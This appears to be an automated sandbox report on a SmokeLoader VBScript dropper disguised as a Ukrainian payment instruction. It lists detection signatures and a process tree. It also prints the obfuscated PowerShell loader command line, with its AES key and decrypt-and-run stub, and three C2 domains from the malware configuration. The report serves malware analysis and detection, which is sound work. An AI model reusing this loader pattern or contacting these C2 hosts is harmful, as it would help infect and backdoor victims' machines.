Windows
Analysis Report
Платiжна iнструкцiя.vbs
Overview
General Information
Field | Value
---|---
Sample name | Платiжна iнструкцiя.vbs (renamed because original name is a hash value)
Original sample name | i ii.vbs
Analysis ID | 1578027
MD5 | 4c2a534b731225c4afa0409c6c16ae19
SHA1 | 97c5cf1b10a2036a0f897883d00bcf11b3c8a93c
SHA256 | 06fe27eb26975a1cb680fff55f815be29e440a0f2312dbc93171f6aa822fb441
Tags | vbs, user-abuse_ch
Infos | 
Detection
Family | Score | Range | Whitelisted | Confidence
---|---|---|---|---
SmokeLoader | 100 | 0 - 100 | false | 100%
Signatures
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected SmokeLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Powershell drops PE file
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 2068, cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Платiжна iнструкцiя.vbs", MD5: A47CBE969EA935BDD3AB568BB126BC80)
- powershell.exe (PID: 6012, cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function kzVl($BRaA){return -split ($BRaA -replace '..', '0x$& ')};$Qiyjc = kzVl('[long hex-encoded AES payload, elided]');$mZBMz =-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((kzVl('72786673574B4C516874716D49544E50')),[byte[]]::new(16)).TransformFinalBlock($Qiyjc,0,$Qiyjc.Length)); & $mZBMz.Substring(0,3) $mZBMz.Substring(3), MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 3964, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- putty.exe (PID: 2056, cmdline: "C:\Users\user\AppData\Roaming\putty.exe", MD5: C02B57E6771A13513DC087F6B45ADAB0)
- explorer.exe (PID: 4084, cmdline: C:\Windows\Explorer.EXE, MD5: 662F4F92FDE3557E86D110526BB578D5)
- edrecib (PID: 3976, cmdline: C:\Users\user\AppData\Roaming\edrecib, MD5: C02B57E6771A13513DC087F6B45ADAB0)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link
---|---|---|---|---
SmokeLoader | The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual download returns an HTTP 404 but still contains data in the response body. | | |
{"Version": 2022, "C2 list": ["http://constractionscity1991.lat/", "http://restructurisationservice.ru/", "http://connecticutproperty.ru/"]}
Source | Rule | Description | Author | Strings
---|---|---|---|---
| Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown |
| JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
| Windows_Trojan_Smokeloader_4e31426e | unknown | unknown |
Source | Rule | Description | Author | Strings
---|---|---|---|---
| JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
System Summary
---|---
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community
Source: | Author: frack113